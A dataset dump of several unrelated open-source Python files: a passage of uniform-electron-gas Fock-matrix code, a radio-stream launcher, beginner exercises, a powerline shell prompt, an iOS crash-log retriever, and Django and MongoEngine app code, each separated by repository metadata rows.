Fvo = F[numpy.ix_(vidx, oidx)]
Fa = one_e_blocks(Foo, Fov, Fvo, Fvv)
Fb = one_e_blocks(Foo, Fov, Fvo, Fvv)
return Fa, Fb
def g_fock(self):
if self.T > 0.0:
raise Exception("Undefined ov blocks at FT")
F = self.g_hcore()
n = F.shape[0]
goidx = self.goidx
gvidx = self.gvidx
V = self.g_aint_tot()
V = V[numpy.ix_(numpy.arange(n), goidx, numpy.arange(n), goidx)]
F = F + einsum('piri->pr', V)
Foo = F[numpy.ix_(goidx, goidx)]
Fvv = F[numpy.ix_(gvidx, gvidx)]
Fov = F[numpy.ix_(goidx, gvidx)]
Fvo = F[numpy.ix_(gvidx, goidx)]
return one_e_blocks(Foo, Fov, Fvo, Fvv)
def r_fock_tot(self):
T = self.r_hcore()
d = self.r_energies_tot()
n = d.shape[0]
if self.T > 0.0:
beta = 1.0 / self.T
fo = ft_utils.ff(beta, d, self.mu)
I = numpy.identity(n)
den = einsum('pi,i,qi->pq', I, fo, I)
else:
to = numpy.zeros((n, self.N))
i = 0
for p in range(n):
if d[p] < self.mu:
to[p, i] = 1.0
i = i+1
den = einsum('pi,qi->pq', to, to)
V = self.r_int_tot()
JK = 2*einsum('prqs,rs->pq', V, den) - einsum('prsq,rs->pq', V, den)
return T + JK
def u_fock_tot(self):
Ta, Tb = self.basis.build_u_ke_matrix()
da, db = self.u_energies_tot()
na = da.shape[0]
nb = db.shape[0]
if self.T > 0.0:
beta = 1.0 / self.T
foa = ft_utils.ff(beta, da, self.mu)
fob = ft_utils.ff(beta, db, self.mu)
Ia = numpy.identity(na)
Ib = numpy.identity(nb)
dena = einsum('pi,i,qi->pq', Ia, foa, Ia)
denb = einsum('pi,i,qi->pq', Ib, fob, Ib)
else:
dena = numpy.zeros((na, na))
denb = numpy.zeros((nb, nb))
for i in range(self.oidx):
dena[i, i] = 1.0
denb[i, i] = 1.0
Va, Vb, Vabab = self.u_aint_tot()
JKa = einsum('prqs,rs->pq', Va, dena)
JKa += einsum('prqs,rs->pq', Vabab, denb)
JKb = einsum('prqs,rs->pq', Vb, denb)
JKb += einsum('prqs,rs->pq', Vabab, dena)
return (Ta + JKa), (Tb + JKb)
def g_fock_tot(self):
T = self.basis.build_g_ke_matrix()
d = self.g_energies_tot()
n = d.shape[0]
if self.T > 0.0:
beta = 1.0 / self.T
fo = ft_utils.ff(beta, d, self.mu)
I = numpy.identity(n)
den = einsum('pi,i,qi->pq', I, fo, I)
else:
to = numpy.zeros((n, self.N))
i = 0
for p in range(n):
if d[p] < self.mu:
to[p, i] = 1.0
i = i+1
den = einsum('pi,qi->pq', to, to)
V = self.g_aint_tot()
JK = einsum('prqs,rs->pq', V, den)
return T + JK
def u_fock_d_tot(self, dveca, dvecb):
da, db = self.u_energies_tot()
na = da.shape[0]
nb = db.shape[0]
if self.T == 0.0:
logging.warning("Occupations derivatives are zero at 0K")
return numpy.zeros((na, na)), numpy.zeros((nb, nb))
beta = 1.0 / self.T
foa = ft_utils.ff(beta, da, self.mu)
fva = ft_utils.ffv(beta, da, self.mu)
veca = dveca*foa*fva
fob = ft_utils.ff(beta, db, self.mu)
fvb = ft_utils.ffv(beta, db, self.mu)
vecb = dvecb*fob*fvb
Ia = numpy.identity(na)
Ib = numpy.identity(nb)
dena = einsum('pi,i,qi->pq', Ia, veca, Ia)
denb = einsum('pi,i,qi->pq', Ib, vecb, Ib)
Va, Vb, Vabab = self.u_aint_tot()
JKa = einsum('prqs,rs->pq', Va, dena)
JKa += einsum('prqs,rs->pq', Vabab, denb)
JKb = einsum('prqs,rs->pq', Vb, denb)
JKb += einsum('prqs,pq->rs', Vabab, dena)
return -JKa, -JKb
def u_fock_d_den(self):
da, db = self.u_energies_tot()
na = da.shape[0]
nb = db.shape[0]
if self.T == 0.0:
logging.warning("Occupations derivatives are zero at 0K")
return numpy.zeros((na, na)), numpy.zeros((nb, nb))
beta = 1.0 / self.T
foa = ft_utils.ff(beta, da, self.mu)
fva = ft_utils.ffv(beta, da, self.mu)
veca = foa*fva
fob = ft_utils.ff(beta, db, self.mu)
fvb = ft_utils.ffv(beta, db, self.mu)
vecb = fob*fvb
Va, Vb, Vabab = self.u_aint_tot()
JKaa = einsum('piqi,i->pqi', Va, veca)
JKab = einsum('piqi,i->pqi', Vabab, vecb)
JKbb = einsum('piqi,i->pqi', Vb, vecb)
JKba = einsum('iris,i->rsi', Vabab, veca)
return JKaa, JKab, JKbb, JKba
def g_fock_d_tot(self, dvec):
d = self.g_energies_tot()
n = d.shape[0]
if self.T == 0.0:
logging.warning("Occupations derivatives are zero at 0K")
return numpy.zeros((n, n))
beta = 1.0 / self.T
fo = ft_utils.ff(beta, d, self.mu)
fv = ft_utils.ffv(beta, d, self.mu)
vec = dvec*fo*fv
I = numpy.identity(n)
den = einsum('pi,i,qi->pq', I, vec, I)
V = self.g_aint_tot()
JK = einsum('prqs,rs->pq', V, den)
return -JK
def g_fock_d_den(self):
d = self.g_energies_tot()
n = d.shape[0]
if self.T == 0.0:
logging.warning("Occupations derivatives are zero at 0K")
return numpy.zeros((n, n))
beta = 1.0 / self.T
fo = ft_utils.ff(beta, d, self.mu)
fv = ft_utils.ffv(beta, d, self.mu)
vec = fo*fv
V = self.g_aint_tot()
JK = einsum('piqi,i->pqi', V, vec)
return JK
def r_hcore(self):
return numpy.diag(numpy.asarray(self.basis.Es))
def g_hcore(self):
return self.basis.build_g_ke_matrix()
def u_aint(self):
if self.T > 0.0:
raise Exception("Undefined ov blocks at FT")
Va, Vb, Vabab = self.u_aint_tot()
oaidx = self.oidx
vaidx = self.vidx
obidx = self.oidx
vbidx = self.vidx
Vvvvv = Va[numpy.ix_(vaidx, vaidx, vaidx, vaidx)]
Vvvvo = Va[numpy.ix_(vaidx, vaidx, vaidx, oaidx)]
Vvovv = Va[numpy.ix_(vaidx, oaidx, vaidx, vaidx)]
Vvvoo = Va[numpy.ix_(vaidx, vaidx, oaidx, oaidx)]
Vvovo = Va[numpy.ix_(vaidx, oaidx, vaidx, oaidx)]
Voovv = Va[numpy.ix_(oaidx, oaidx, vaidx, vaidx)]
Vvooo = Va[numpy.ix_(vaidx, oaidx, oaidx, oaidx)]
Vooov = Va[numpy.ix_(oaidx, oaidx, oaidx, vaidx)]
Voooo = Va[numpy.ix_(oaidx, oaidx, oaidx, oaidx)]
Va = two_e_blocks(
vvvv=Vvvvv, vvvo=Vvvvo,
vovv=Vvovv, vvoo=Vvvoo,
vovo=Vvovo, oovv=Voovv,
vooo=Vvooo, ooov=Vooov,
oooo=Voooo)
Vvvvv = Vb[numpy.ix_(vbidx, vbidx, vbidx, vbidx)]
Vvvvo = Vb[numpy.ix_(vbidx, vbidx, vbidx, obidx)]
Vvovv = Vb[numpy.ix_(vbidx, obidx, vbidx, vbidx)]
Vvvoo = Vb[numpy.ix_(vbidx, vbidx, obidx, obidx)]
Vvovo = Vb[numpy.ix_(vbidx, obidx, vbidx, obidx)]
Voovv = Vb[numpy.ix_(obidx, obidx, vbidx, vbidx)]
Vvooo = Vb[numpy.ix_(vbidx, obidx, obidx, obidx)]
Vooov = Vb[numpy.ix_(obidx, obidx, obidx, vbidx)]
Voooo = Vb[numpy.ix_(obidx, obidx, obidx, obidx)]
Vb = two_e_blocks(
vvvv=Vvvvv, vvvo=Vvvvo,
vovv=Vvovv, vvoo=Vvvoo,
vovo=Vvovo, oovv=Voovv,
vooo=Vvooo, ooov=Vooov,
oooo=Voooo)
Vvvvv = Vabab[numpy.ix_(vaidx, vbidx, vaidx, vbidx)]
Vvvvo = Vabab[numpy.ix_(vaidx, vbidx, vaidx, obidx)]
Vvvov = Vabab[numpy.ix_(vaidx, vbidx, oaidx, vbidx)]
Vvovv = Vabab[numpy.ix_(vaidx, obidx, vaidx, vbidx)]
Vovvv = Vabab[numpy.ix_(oaidx, vbidx, vaidx, vbidx)]
Vvvoo = Vabab[numpy.ix_(vaidx, vbidx, oaidx, obidx)]
Vvoov = Vabab[numpy.ix_(vaidx, obidx, oaidx, vbidx)]
Vvovo = Vabab[numpy.ix_(vaidx, obidx, vaidx, obidx)]
Vovvo = Vabab[numpy.ix_(oaidx, vbidx, vaidx, obidx)]
Vovov = Vabab[numpy.ix_(oaidx, vbidx, oaidx, vbidx)]
Voovv = Vabab[numpy.ix_(oaidx, obidx, vaidx, vbidx)]
Vvooo = Vabab[numpy.ix_(vaidx, obidx, oaidx, obidx)]
Vovoo = Vabab[numpy.ix_(oaidx, vbidx, oaidx, obidx)]
Voovo = Vabab[numpy.ix_(oaidx, obidx, vaidx, obidx)]
Vooov = Vabab[numpy.ix_(oaidx, obidx, oaidx, vbidx)]
Voooo = Vabab[numpy.ix_(oaidx, obidx, oaidx, obidx)]
Vabab = two_e_blocks_full(
vvvv=Vvvvv, vvvo=Vvvvo,
vvov=Vvvov, vovv=Vvovv,
ovvv=Vovvv, vvoo=Vvvoo,
vovo=Vvovo, ovvo=Vovvo,
voov=Vvoov, ovov=Vovov,
oovv=Voovv, vooo=Vvooo,
ovoo=Vovoo, oovo=Voovo,
ooov=Vooov, oooo=Voooo)
return Va, Vb, Vabab
def g_aint(self, code=0):
if self.T > 0.0:
raise Exception("Undefined ov blocks at FT")
V = self.g_aint_tot()
Vvvvv = None
Vvvvo = None
Vvovv = None
Vvvoo = None
Vvovo = None
Voovv = None
Vvooo = None
Vooov = None
Voooo = None
goidx = self.goidx
gvidx = self.gvidx
if code == 0 or code == 1:
Vvvvv = V[numpy.ix_(gvidx, gvidx, gvidx, gvidx)]
if code == 0 or code == 2:
Vvvvo = V[numpy.ix_(gvidx, gvidx, gvidx, goidx)]
if code == 0 or code == 3:
Vvovv = V[numpy.ix_(gvidx, goidx, gvidx, gvidx)]
if code == 0 or code == 4:
Vvvoo = V[numpy.ix_(gvidx, gvidx, goidx, goidx)]
if code == 0 or code == 5:
Vvovo = V[numpy.ix_(gvidx, goidx, gvidx, goidx)]
if code == 0 or code == 6:
Voovv = V[numpy.ix_(goidx, goidx, gvidx, gvidx)]
if code == 0 or code == 7:
Vvooo = V[numpy.ix_(gvidx, goidx, goidx, goidx)]
if code == 0 or code == 8:
Vooov = V[numpy.ix_(goidx, goidx, goidx, gvidx)]
if code == 0 or code == 9:
Voooo = V[numpy.ix_(goidx, goidx, goidx, goidx)]
return two_e_blocks(
vvvv=Vvvvv, vvvo=Vvvvo,
vovv=Vvovv, vvoo=Vvvoo,
vovo=Vvovo, oovv=Voovv,
vooo=Vvooo, ooov=Vooov,
oooo=Voooo)
def u_aint_tot(self):
return self.basis.build_u2e_matrix()
def g_aint_tot(self):
return self.basis.build_g2e_matrix()
def r_int_tot(self):
return self.basis.build_r2e_matrix()
def g_int_tot(self):
return self.basis.build_g2e_matrix(anti=False)
class ueg_scf_system(UEGSCFSystem):
def __init__(self, T, L, Emax, mu=None, na=None, nb=None,
norb=None, orbtype='u', madelung=None, naref=None):
logging.warning("This class is deprecated, use UEGSCFSystem instead")
UEGSCFSystem.__init__(
self, T, L, Emax, mu=mu, na=na, nb=nb, norb=norb,
orbtype=orbtype, madelung=madelung, naref=naref)
| 36.035032 | 77 | 0.506628 |
795538701972a039f912b478252ddc9959982731 | 2,972 | py | Python | streams.py | exu0/play-streams | 0e8cbfe4e5f09d57680afef3bc2a6b9de9ff0e4b | [
"MIT"
] | null | null | null | streams.py | exu0/play-streams | 0e8cbfe4e5f09d57680afef3bc2a6b9de9ff0e4b | [
"MIT"
] | null | null | null | streams.py | exu0/play-streams | 0e8cbfe4e5f09d57680afef3bc2a6b9de9ff0e4b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import ConfigParser
import sys
import subprocess
import os
CONFIG_FILE = "config"
class Station:
def __init__(self, name, url, playlist):
self.name = name
self.url = url
self.playlist = playlist
def __str__(self):
return self.name
class Config:
def __init__(self, configFile):
config = ConfigParser.ConfigParser(defaults = {"playlist" : "yes"})
config.read(configFile)
self.stations = ["dummy"]
try:
stationNames = config.get("Global", "stations")
self.dirName = config.get("Global", "dir").rstrip("/")+"/"
self.player = config.get("Global", "player")
for stationName in stationNames.split():
if not config.has_section(stationName):
print "no section", stationName
continue
displayName = config.get(stationName, "name")
url = config.get(stationName, "url")
playlist = config.getboolean(stationName, "playlist")
station = Station(displayName, url, playlist)
self.stations.append(station)
except Exception as e:
print "ERROR Could not read config file "+configFile+":", str(e)
exit(1)
def killOld(pidFile):
try:
with open(pidFile, "r") as pidf:
killed = False
for line in pidf.readlines():
pid = int(line.strip())
try:
os.kill(pid, 15)
killed = True
except Exception:
pass
os.remove(pidFile)
except IOError:
pass
def osd(message):
cmd = 'echo '+message+' | /usr/bin/aosd_cat --font="Serif 30" -o 1000 -u 400 -R white -f 0 -p 4 -x -640 -y -20'
os.system(cmd)
def showTag(config):
stationFile = config.dirName+"station"
tagFile = config.dirName+"tag"
try:
with open(stationFile) as sf:
with open(tagFile) as tf:
tag = tf.read()
station = sf.read()
cmd = '/usr/bin/notify-send -i gnome-volume-control "'+station+'" "'+tag+'"'
os.system(cmd)
except IOError as e:
print e
if __name__ == "__main__":
path = os.path.dirname(os.path.realpath(__file__))
config = Config(path+"/"+CONFIG_FILE)
if len(sys.argv) != 2:
showTag(config)
exit(0)
try:
num = int(sys.argv[1])
except ValueError:
exit(1)
pidFile = config.dirName+"pid"
if num == 0:
killOld(pidFile)
osd("off")
exit(0)
station = config.stations[num]
killOld(pidFile)
subprocess.Popen(["/usr/bin/python", path+"/"+config.player, "-s", station.name, station.url, "-d", config.dirName], stderr = sys.stderr, stdout = sys.stdout)
osd(station.name) | 31.284211 | 162 | 0.534657 |
795538852163022525f780c5c77ca505a20c4c72 | 172 | py | Python | des097.py | LeonardoPereirajr/Curso_em_video_Python | 9d8a97ba3389c8e86b37dfd089fab5d04adc146d | [
"MIT"
] | null | null | null | des097.py | LeonardoPereirajr/Curso_em_video_Python | 9d8a97ba3389c8e86b37dfd089fab5d04adc146d | [
"MIT"
] | null | null | null | des097.py | LeonardoPereirajr/Curso_em_video_Python | 9d8a97ba3389c8e86b37dfd089fab5d04adc146d | [
"MIT"
] | null | null | null | def escreva(msg):
c = len(msg) + 4
print(c * '^')
print(f' {msg} ')
print(c * '^')
#PRINCIPAL
escreva('LEONARDO PEREIRA junior')
print()
| 12.285714 | 35 | 0.488372 |
795539719af164627911840332d64c624d57efad | 1,412 | py | Python | Chapter_3/Dictionary/dictionary.py | random-forest-ai/python_course | cd6b7f30e1932312c05178e6bb66cc95c72fe6c1 | [
"MIT"
] | null | null | null | Chapter_3/Dictionary/dictionary.py | random-forest-ai/python_course | cd6b7f30e1932312c05178e6bb66cc95c72fe6c1 | [
"MIT"
] | null | null | null | Chapter_3/Dictionary/dictionary.py | random-forest-ai/python_course | cd6b7f30e1932312c05178e6bb66cc95c72fe6c1 | [
"MIT"
] | null | null | null | if __name__ == '__main__':
# Declare
# x = {}
# x = {"Apple": 1, 10000: [1,2,3]}
x = dict( [("London", 9623), ("New York", 12947)] ) # dict(list of tuples)
# x = {[1,2,3]: 100} # Not OK, keys should be immutable
# x = {100: [1,2,3]}
# x = {2: 4, 2: 6}
x = {-2: 4, 2: 4}
distance_from_HK = {"London": 9623, "New York": 12947,
"Lima": 18349, "Singapore": 2587}
# distance_from_HK["London"]
# distance_from_HK["Taipei"]
# distance_from_HK.get("London")
# distance_from_HK.get("Taipei")
distance_from_HK["Vienna"] = 8729
distance_from_HK.update({"Londres": 9623, "Wien": 8729})
distance_from_HK["Istanbull"] = 80170
# Modify
distance_from_HK["Istanbull"] = 8017
del distance_from_HK["Istanbull"]
distance_from_HK["Istanbul"] = 8017
val = distance_from_HK.pop("Wien")
print(val)
entry = distance_from_HK.popitem()
print(entry)
# Keys, values, items
keys = distance_from_HK.keys()
values = distance_from_HK.values()
items = distance_from_HK.items()
# Iterating through Dict
# for city in distance_from_HK:
# print(city, end = " ")
# for distance in distance_from_HK.values():
# print(distance, end = " ")
for city, distance in distance_from_HK.items():
print("The distance from Hong Kong to {} is: {} km".format(city, distance)) | 27.686275 | 83 | 0.594193 |
795539a6ae0fa802f64e8ce7dcd0562302fd788b | 5,241 | py | Python | .bash/powerline-shell/powerline_shell_base.py | chrislaskey/.dot-files | 44be2364f2824a2c70300f7c0f2963a592c7083e | [
"MIT"
] | null | null | null | .bash/powerline-shell/powerline_shell_base.py | chrislaskey/.dot-files | 44be2364f2824a2c70300f7c0f2963a592c7083e | [
"MIT"
] | null | null | null | .bash/powerline-shell/powerline_shell_base.py | chrislaskey/.dot-files | 44be2364f2824a2c70300f7c0f2963a592c7083e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import sys
py3 = sys.version_info.major == 3
def warn(msg):
print('[powerline-bash] ', msg)
class Powerline:
symbols = {
'compatible': {
'lock': 'RO',
'network': 'SSH',
'separator': u'\u25B6',
'separator_thin': u'\u276F'
},
'patched': {
'lock': u'\uE0A2',
'network': u'\uE0A2',
'separator': u'\uE0B0',
'separator_thin': u'\uE0B1'
},
'flat': {
'lock': '',
'network': '',
'separator': '',
'separator_thin': ''
},
}
color_templates = {
'bash': '\\[\\e%s\\]',
'zsh': '%%{%s%%}',
'bare': '%s',
}
def __init__(self, args, cwd):
self.args = args
self.cwd = cwd
mode, shell = args.mode, args.shell
self.color_template = self.color_templates[shell]
self.reset = self.color_template % '[0m'
self.lock = Powerline.symbols[mode]['lock']
self.network = Powerline.symbols[mode]['network']
self.separator = Powerline.symbols[mode]['separator']
self.separator_thin = Powerline.symbols[mode]['separator_thin']
self.segments = []
def color(self, prefix, code):
if code is None:
return ''
else:
return self.color_template % ('[%s;5;%sm' % (prefix, code))
def fgcolor(self, code):
return self.color('38', code)
def bgcolor(self, code):
return self.color('48', code)
def append(self, content, fg, bg, separator=None, separator_fg=None):
self.segments.append((content, fg, bg,
separator if separator is not None else self.separator,
separator_fg if separator_fg is not None else bg))
def draw(self):
text = (''.join(self.draw_segment(i) for i in range(len(self.segments)))
+ self.reset) + ' '
if py3:
return text
else:
return text.encode('utf-8')
def draw_segment(self, idx):
segment = self.segments[idx]
next_segment = self.segments[idx + 1] if idx < len(self.segments)-1 else None
return ''.join((
self.fgcolor(segment[1]),
self.bgcolor(segment[2]),
segment[0].lstrip(),
self.bgcolor(next_segment[2]) if next_segment else self.reset,
self.fgcolor(segment[4]),
segment[3]))
def get_valid_cwd():
""" We check if the current working directory is valid or not. Typically
happens when you checkout a different branch on git that doesn't have
this directory.
We return the original cwd because the shell still considers that to be
the working directory, so returning our guess will confuse people
"""
# Prefer the PWD environment variable. Python's os.getcwd function follows
# symbolic links, which is undesirable. But if PWD is not set then fall
# back to this func
try:
cwd = os.getenv('PWD') or os.getcwd()
except:
warn("Your current directory is invalid. If you open a ticket at " +
"https://github.com/milkbikis/powerline-shell/issues/new " +
"we would love to help fix the issue.")
sys.stdout.write("> ")
sys.exit(1)
parts = cwd.split(os.sep)
up = cwd
while parts and not os.path.exists(up):
parts.pop()
up = os.sep.join(parts)
if cwd != up:
warn("Your current directory is invalid. Lowest valid directory: "
+ up)
return cwd
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--cwd-mode', action='store',
help='How to display the current directory', default='fancy',
choices=['fancy', 'plain', 'dironly'])
arg_parser.add_argument('--cwd-only', action='store_true',
help='Deprecated. Use --cwd-mode=dironly')
arg_parser.add_argument('--cwd-max-depth', action='store', type=int,
default=5, help='Maximum number of directories to show in path')
arg_parser.add_argument('--cwd-max-dir-size', action='store', type=int,
help='Maximum number of letters displayed for each directory in the path')
arg_parser.add_argument('--colorize-hostname', action='store_true',
help='Colorize the hostname based on a hash of itself.')
arg_parser.add_argument('--mode', action='store', default='patched',
help='The characters used to make separators between segments',
choices=['patched', 'compatible', 'flat'])
arg_parser.add_argument('--remote-hostname', action='store_true',
help='Display the hostname only if on a remote machine')
arg_parser.add_argument('--shell', action='store', default='bash',
help='Set this to your shell type', choices=['bash', 'zsh', 'bare'])
arg_parser.add_argument('prev_error', nargs='?', type=int, default=0,
help='Error code returned by the last command')
args = arg_parser.parse_args()
powerline = Powerline(args, get_valid_cwd())
| 35.412162 | 86 | 0.58901 |
79553a34161cc1fb9df2106135e662d55e330b6d | 4,258 | py | Python | lib/3rdparty/osx/MobileDevice/crashmover.py | tommo/gii | 03624a57cf74a07e38bfdc7f53c50bd926b7b5a7 | [
"MIT"
] | 7 | 2016-02-13T18:47:23.000Z | 2020-07-03T13:47:49.000Z | crashmover.py | db17/MobileDevice | 11dee1a63030fc5d1e459cac88e7f2716a7811f6 | [
"MIT"
] | 1 | 2018-06-13T04:55:27.000Z | 2021-11-05T05:52:51.000Z | crashmover.py | db17/MobileDevice | 11dee1a63030fc5d1e459cac88e7f2716a7811f6 | [
"MIT"
] | 4 | 2016-02-15T13:32:46.000Z | 2019-12-12T17:22:31.000Z | #!/usr/bin/python
# coding: utf-8
# Copyright (c) 2013 Mountainstorm
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from MobileDevice import *
from amdevice import *
from plistservice import *
import os
import time
class CrashMover(object):
u'''Moves crash logs from their various scattered locations into the afc
crash log directory'''
def __init__(self, amdevice):
self.s = amdevice.start_service(u'com.apple.crashreportmover')
if self.s is None:
raise RuntimeError(u'Unable to launch: com.apple.crashreportmover')
def disconnect(self):
os.close(self.s)
def move_crashlogs(self, extensions=None):
u'''Moves all crash logs into the afc crash log directory
Arguments:
extensions -- if present a list of crash file extensions to move
XXX not currently working
'''
# XXX should we wait just in case?
time.sleep(2)
buf = os.read(self.s, 1)
while True:
buf += os.read(self.s, 1)
if buf == 'ping':
break # done!
def register_argparse_crashmover(cmdargs):
import argparse
import sys
import afccrashlogdirectory
import posixpath
import stat
def cmd_crashmove(args, dev):
cm = CrashMover(dev)
cm.move_crashlogs()
cm.disconnect()
def get_logs(afc, path, dest):
dirlist = []
for name in afc.listdir(path):
info = afc.lstat(posixpath.join(path, name))
if info.st_ifmt == stat.S_IFDIR:
dirlist.append((
posixpath.join(path, name),
os.path.join(dest, name)
))
try:
os.mkdir(os.path.join(dest, name))
except OSError:
pass # it already exists
elif info.st_ifmt == stat.S_IFLNK:
pass # XXX handle symlinks e.g. LatestCrash*
else:
s = afc.open(posixpath.join(path, name), u'r')
d = open(os.path.join(dest, name), u'w+')
d.write(s.readall())
d.close()
s.close()
for names in dirlist:
get_logs(afc, names[0], names[1])
def del_logs(afc, path):
dirlist = []
for name in afc.listdir(path):
info = afc.lstat(posixpath.join(path, name))
if info.st_ifmt == stat.S_IFDIR:
dirlist.append(posixpath.join(path, name))
else:
afc.remove(posixpath.join(path, name))
for name in dirlist:
del_logs(afc, name)
afc.remove(name)
def cmd_crashget(args, dev):
# move the crashes
cm = CrashMover(dev)
cm.move_crashlogs()
cm.disconnect()
# retrieve the crashes
afc = afccrashlogdirectory.AFCCrashLogDirectory(dev)
get_logs(afc, u'/', args.dest.decode(u'utf-8'))
# optionally, delete the crashes
if args.delete_logs:
del_logs(afc, u'/')
afc.disconnect()
# cmd_crashmove command
crashparser = cmdargs.add_parser(
u'crash',
help=u'manipulates crash logs'
)
crashcmd = crashparser.add_subparsers()
crashmovecmd = crashcmd.add_parser(
u'move',
help=u'moves crash logs into the afc directory'
)
crashmovecmd.set_defaults(func=cmd_crashmove)
# get the crash logs
crashgetcmd = crashcmd.add_parser(
u'get',
help=u'retrieves crash logs from the device'
)
crashgetcmd.add_argument(
u'-d',
dest=u'delete_logs',
action=u'store_true',
help=u'if specified, delete the crash logs after retrieval'
)
crashgetcmd.add_argument(
u'dest',
help=u'destination directory; files are appended into it'
)
crashgetcmd.set_defaults(func=cmd_crashget)
| 27.649351 | 80 | 0.716768 |
79553a9fa1b80d1ef8326a60f1a7d5072d08ac88 | 855 | py | Python | bespin/wsgi.py | Duke-GCB/bespin-api | cea5c20fb2ff592adabe6ebb7ca934939aa11a34 | [
"MIT"
] | null | null | null | bespin/wsgi.py | Duke-GCB/bespin-api | cea5c20fb2ff592adabe6ebb7ca934939aa11a34 | [
"MIT"
] | 137 | 2016-12-09T18:59:45.000Z | 2021-06-10T18:55:47.000Z | bespin/wsgi.py | Duke-GCB/bespin-api | cea5c20fb2ff592adabe6ebb7ca934939aa11a34 | [
"MIT"
] | 3 | 2017-11-14T16:05:58.000Z | 2018-12-28T18:07:43.000Z | """
WSGI config for bespin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bespin.settings_prod")
env_variables_to_pass = [
'BESPIN_SECRET_KEY',
'BESPIN_ALLOWED_HOST',
'BESPIN_DB_NAME',
'BESPIN_DB_USER',
'BESPIN_DB_PASSWORD',
'BESPIN_DB_HOST',
'BESPIN_CORS_HOST',
'BESPIN_STATIC_ROOT',
]
def application(environ, start_response):
# pass the WSGI environment variables on through to os.environ
for var in env_variables_to_pass:
os.environ[var] = environ.get(var, '')
_application = get_wsgi_application()
return _application(environ, start_response)
| 25.909091 | 78 | 0.750877 |
79553b99342f6d48c8e47b8a83d504013a44f32b | 877 | py | Python | germanium/patch.py | jsilhan/germanium | f7df0f3adfd13d9a9eb0b2e1ee691099ca55527a | [
"MIT"
] | null | null | null | germanium/patch.py | jsilhan/germanium | f7df0f3adfd13d9a9eb0b2e1ee691099ca55527a | [
"MIT"
] | null | null | null | germanium/patch.py | jsilhan/germanium | f7df0f3adfd13d9a9eb0b2e1ee691099ca55527a | [
"MIT"
] | null | null | null |
def patch_broken_pipe_error():
"""Monkey Patch BaseServer.handle_error to not write
a stacktrace to stderr on broken pipe.
http://stackoverflow.com/a/22618740/362702"""
import sys
from socketserver import BaseServer
from wsgiref import handlers
handle_error = BaseServer.handle_error
log_exception = handlers.BaseHandler.log_exception
def is_broken_pipe_error():
type, err, tb = sys.exc_info()
return repr(err) == "error(32, 'Broken pipe')"
def my_handle_error(self, request, client_address):
if not is_broken_pipe_error():
handle_error(self, request, client_address)
def my_log_exception(self, exc_info):
if not is_broken_pipe_error():
log_exception(self, exc_info)
BaseServer.handle_error = my_handle_error
handlers.BaseHandler.log_exception = my_log_exception
| 32.481481 | 57 | 0.711517 |
79553bd45c868adcf00ba5bad9715cca2e4e5372 | 2,336 | py | Python | app/customer/models/feedback.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | 2 | 2017-12-02T13:58:30.000Z | 2018-08-02T17:07:59.000Z | app/customer/models/feedback.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | app/customer/models/feedback.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | #coding=utf-8
from mongoengine import *
import logging
import datetime
from app.customer.models.user import *
from django.db import models
from base.settings import CHATPAMONGO
connect(CHATPAMONGO.db, host=CHATPAMONGO.host, port=CHATPAMONGO.port, username=CHATPAMONGO.username,
password=CHATPAMONGO.password)
class FeedbackInfo(Document):
STATUS = [
(0, u'未读'),
(1, u'已读'),
(2, u'已解决'),
(3, u'暂缓解决'),
]
user_id = IntField(verbose_name=u'用户id', required=True)
created_at = DateTimeField(verbose_name=u'创建时间', default=None)
user_agent = StringField(verbose_name=u'ua', max_length=256, default='')
desc = StringField(verbose_name=u'问题描述', max_length=65535, default='')
phone_number=StringField(verbose_name=u'电话号码',max_length=16, default='')
qq_number=StringField(verbose_name=u'qq号码', max_length=32, default='')
status = IntField(verbose_name=u"处理状态", default=0) # 0:未处理 1:已处理 2:忽略
update_time = DateTimeField(verbose_name=u"处理时间")
operator = StringField(verbose_name=u"操作人")
operaterecord = StringField(verbose_name=u"操作记录")
is_answer = IntField(verbose_name=u'是否回复', default=0) # 0:没回复 1:回复
class Meta:
app_label = "customer"
verbose_name = u"反馈"
verbose_name_plural = verbose_name
@classmethod
def create_feedback(cls, user_id, created_at, ua='', desc='', phone_number='',qq_number=''):
try:
feedback = FeedbackInfo(
user_id=user_id,
created_at=created_at,
status=0,
user_agent=ua,
desc=desc,
phone_number=phone_number,
qq_number=qq_number,
)
feedback.save()
except Exception,e:
logging.error("create feedback error:{0}".format(e))
return False
return str(feedback.id)
@classmethod
def check_feedback(cls, user_id, created_at):
feedbacks = FeedbackInfo.objects.filter(user_id=user_id).order_by('-created_at')
if not feedbacks:
return False
else:
last_time = feedbacks.first().created_at
if created_at.strftime('%Y-%m-%d') == last_time.strftime('%Y-%m-%d'):
return True
else:
return False
| 33.855072 | 100 | 0.624572 |
